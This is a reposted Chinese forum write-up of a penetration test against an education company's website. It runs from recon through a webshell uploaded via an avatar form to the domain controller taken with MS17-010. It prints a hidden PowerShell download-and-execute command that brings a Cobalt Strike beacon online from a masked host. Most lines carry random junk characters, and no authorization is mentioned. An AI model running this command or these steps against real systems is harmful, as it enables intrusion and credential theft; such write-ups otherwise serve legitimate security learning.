& l; `3 x( a% w& N3 X% P, ?# [
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
6 v0 g; k: k3 u; m. i
; S7 r- Z! J- e! v, K2 f/ I
+ n% [ S! l+ G1 `5 z; Z0 Y4 z
6 c; H3 N" }( j 8 b* O) q. B! h+ P$ Q' @
2 ?5 L. |4 j8 p+ e6 A 正文
+ J9 \$ |( c$ m 6 X- ^+ k% a9 F
5 J/ q o- Y. f: j( }
8 {( }& H* h3 `
* z' @% B$ b; z8 X! A( U/ Z: B: t {5 Y7 S: |8 N& o
目标:www.xxxx.com(一家教育机构)
( N0 p! X, f8 v; A2 Q4 [. \+ \5 T打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
/ p- b, J- J0 E% Y2 s 5 a* h( T! v: F0 g: J
1 p/ Q$ }" i3 f0 M# R
5 c! m( ^) {: L2 W; s
* y: k0 I4 s$ z- B
9 P; y4 k8 l1 W* ~/ V% Q- M$ R
进行了简单的信息搜集
' T/ i! v |% `; V- s0 ^$ y 2 z6 ^; Q4 _! N( x+ P6 s
?& t5 Q, @9 Q' M& \1 s8 d) i, D
# s2 f; A% h2 F
0 @/ y1 X0 }# v5 Q. T 子域名搜集' V5 M! k1 t: F& C: B0 z3 d
/ M8 }2 j+ ?- q# {0 t4 D/ y" q4 U, ^7 t5 C' l) D) w
! W+ R+ }; [) }* s0 b; c3 _* M % u; Q( ^& ] i5 M7 |) a( }$ z! ?
2 l$ i; t9 R' E6 f fofa找资产 ( H* S0 I, G4 E. U o z
1 p, P- I* e$ o- b. b
) R/ d+ B& d5 C# R8 n( f6 r' L
5 R: I S$ X% V0 D6 e6 Q0 I
5 z3 t k; U2 C$ T8 O( P" }* E 5 B5 s: |1 y, X1 {2 \
* P' W( f( p, B& a& O, t2 Y
5 J& [ y- n, D0 a8 Z, [: H 一共七个资产。去重之后只有两个。
' y I( Y, s+ r. G # d& ?7 T4 n0 a3 n2 K' i
0 |; x; t7 r- `/ n' X7 j5 ~6 ` ; n7 h, L$ y9 G" X7 [
, i) r8 H! Y3 K' J+ }- j/ `" D. U
目录探测- U4 _. W& y0 ^4 p9 Y
0 L" G" g; F- M' y1 j+ J3 Z; d6 [
: U Y! ]- b! w0 O( I; R
7 v \. V& D& A; t
6 ^' S" u0 z9 z# h* a) {5 j" a5 \1 D* f) {* I/ E
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 / J1 G; ]- e+ ^, o: K- F1 Y! @4 K
- j3 v; F" K! {0 y8 D
" C% L5 V9 h) Z2 B - f2 i0 a$ @, x1 y
2 V! P/ R7 U/ N. d. {# y
我又尝试了通过修改返回包来绕过登录界面" C3 I3 U4 {* O2 F& I7 W
1 ^8 V! Y) S9 ?% A5 x
5 q4 l9 W8 c9 Y# G ]" G& S' r
* s1 R$ a/ F& P) q3 G, p- {
) F9 x5 O, ]- g" i' I& }# U
% j U8 \3 i) l5 U5 i 还是不行,尝试注入无果
5 m: } Z7 w7 i; v
* t# w: A7 k/ ^- C7 u. }
2 W. M) j/ \; K- m1 I ! h. q3 t$ Y7 [; |0 r5 f
' D9 Q+ U8 ~7 C" b- X" N$ n4 W3 B
. k/ e+ r: n* V
不过我目录探测出了一处Spring信息泄露
3 C8 l% `5 |2 y2 u6 R1 X% k; W
9 a' ~; U% Z" h) u
3 ~- H2 `( ?0 ?& s $ T, [1 e3 J+ K }9 C+ r& {
# y; Q# f7 b; O/ V% ^3 Q 0 m! |, L' U, F7 b9 t! m& ], |
4 A. Q1 z [3 }( u4 l9 V$ w& X% V9 J6 Z: w1 s0 i4 Y( |6 a
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录) O: B0 N1 L0 ?
! U3 \4 s) I# o0 O, g1 S1 L
0 O- z4 g! i+ p7 I8 {" o
5 ^7 P2 _5 b, B6 O# l0 ^
\5 ^- j& t8 N% c9 K* G1 @7 V. s; B m3 `3 E* d6 i- a
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
, j3 u( d9 \; v) ~/ S2 ^% Q. X
5 F6 a2 y; V8 u3 H4 H$ _
8 A. l* E( k/ x, A
5 p. ]0 m/ T7 }- G; l : Q/ \' d1 Q/ v8 Q! @7 b" G
7 X5 G" F/ @& ~6 |7 L 获取有些师傅到这一步就手机抓包电脑测了。
- B' }; A, S8 ]! D; k, \% B
( c$ o: g) c1 N; x7 G
: r! c( i, v4 b& b9 n: Q3 q Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。/ L% _# e0 k3 c* B% J' }6 a
5 O! J- `. ?0 v* Z7 t3 [2 l* f) m/ |. Y9 k& l* Q- `3 j$ `
其中在一个公众号发现了小程序,可以进行注册。
* T" F( K# t7 ^& E6 f9 b 3 ?6 K! r$ s ]5 R. L! J
! o% D% B# \) B& [! d
看到了头像上传,尝试上传获取WebShell
, B/ a. I/ \. a2 x 3 P$ |, o. u" \9 g
" Y: Z6 E; ]9 Q: k' b
! ~* D9 J8 L& \0 E& F. u _ 0 g7 s5 \( ~1 l' N
9 J3 g8 L t* t* X0 s; X 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
}" m" n8 r4 B c
. H" M* V8 N' C+ g3 n4 n e* Z
( `+ R8 f* q+ y) [& n 0 s5 B6 b7 } [' {" ~
8 p1 r. G" l v: p! d9 l3 f( @
1 u5 `0 _. I7 Q6 A0 p/ [6 P5 R
然后上了大马2 o) L" \7 e3 `& |0 S, A
0 u% s1 j8 f( a( g4 s' n
* k7 ~1 V( w7 d9 [ & B1 l& t$ Q$ n( d D) O0 i8 y
' K+ E5 \8 F6 t5 F8 f- q' h
n; l8 d) v3 B+ d6 ?( O$ Y- I
8 O6 q3 [. b* E* ~
* w3 F' ~: o- K0 z
/ A: A; l2 P- x8 { 通过翻找文件发现数据库账号密码 h! d- n3 b3 v5 M2 S- x
9 r, [# Z/ N8 S F
. i4 f( r, r# `8 N4 m
6 N4 k" q: b6 X6 R- f; ^5 N - d+ _1 Z" R3 b9 _& c
9 R. d9 X2 ~+ S" L
--内网渗透8 [5 _* Q0 A" v; Z! _+ G9 _' z
* \6 W: b0 `0 Y0 Z( _3 I
3 Q5 t* m- ~/ n) F$ S" A
直接通过powershell执行 cs上线
" ~- e/ y% a# ^ / ?" J7 ^9 O# l; z. d; }/ N
/ ] A* v1 g' a9 o, o+ I! O powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
% }0 c! D5 Z! z ! G. {! w' H' i1 z4 A
' V3 a6 G% N! G% h1 r. U
4 F- ^7 }4 z3 w. B1 R$ B c
0 J* }, k) @4 ~3 V% @& `; g! m
3 |" G8 _- ^& V" M1 i/ k 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破$ Q! y% H0 n! d+ M: l& q
) N1 \2 o3 q6 E% `/ h
D$ Z4 J1 z8 U+ p) ?9 z7 l& L) t
8 B2 i- Y( H2 t' ~6 I! p- U
! E% w, j; |+ D0 ?$ e9 y% u5 W5 g
$ r6 a) r; z& b& b 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 & n: H4 G* r, Y0 K8 ~# R
* @; m n, |$ Q% M! K2 g
' R# N) D$ j, z! l
5 [& s ?) }9 C$ t # F. l' S/ Q9 I1 A f) B
- O# x- H6 ]7 B/ U/ t
2 F; V0 C2 i/ u# O5 W 0 ~( R# Q7 e( r3 e. k) X# d
' |; W# o. W& O9 B9 e* l
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
8 T0 J1 x, {4 J3 _ / J7 E: l+ i& |% y( r
; x. c8 [' i5 m. m 6 J* N0 Z7 \- S" Q* S3 \" Z
( {1 E1 ?* j0 Y
L8 Y0 g2 j( o ? 3 h: n* T1 k- s* J$ ]$ V- O" P6 D
% s1 J5 u9 Y7 ^9 n( c
# ?8 t: f0 r0 ~3 b, d * Q$ ~6 A( _% E( e D+ ~
/ A. U# v8 D0 x b* P & ?4 `9 T& q8 }" F" M* c
# H: z9 J8 S- _0 Z * W" A: h e/ C# g- z$ s* h
; J7 A' r. c8 S+ g/ x
) j4 t' j- e1 v! ~ 小结
* ~- t5 [" S& q( V9 R' E& _
1 L' }0 E9 T+ u0 y! b7 w& t4 p9 ]4 A U' f
* r# g7 d% A) k* f4 w. C
9 T. z. p5 M; g/ W# R: ^5 A7 b
* E7 G8 P* _: c
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!7 C! @1 V( h4 N% J5 N/ D
( y' l0 F# `" Z* C! s3 k- _6 p+ Q. z+ Z
/ @0 T. S2 G% }9 {+ h. G$ D
% A, ?* j+ @/ |3 N8 l
! V4 M8 R& A* J; L2 W9 ?
- $ f6 ]7 W3 t% {- b
4 l) K# {0 f) I, M
4 f e0 D+ L O( P0 d. H8 z6 T
- $ F' a9 i" _ v) `
/ X6 R) M/ |8 Z; c7 X
2 ]0 t! q, K4 p- U* v* _( i
' m; a6 `* _: u9 z7 H+ E- Z
0 [8 ~! G9 H$ j; h) V
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html* [. S# F, N- V! B4 L" v5 o' ]
9 j2 U/ }) D8 h8 N6 N1 A! r4 q
; W" R; \* ` s& B* R/ h5 P% g$ V - D( v/ ?3 C5 h# f" T
|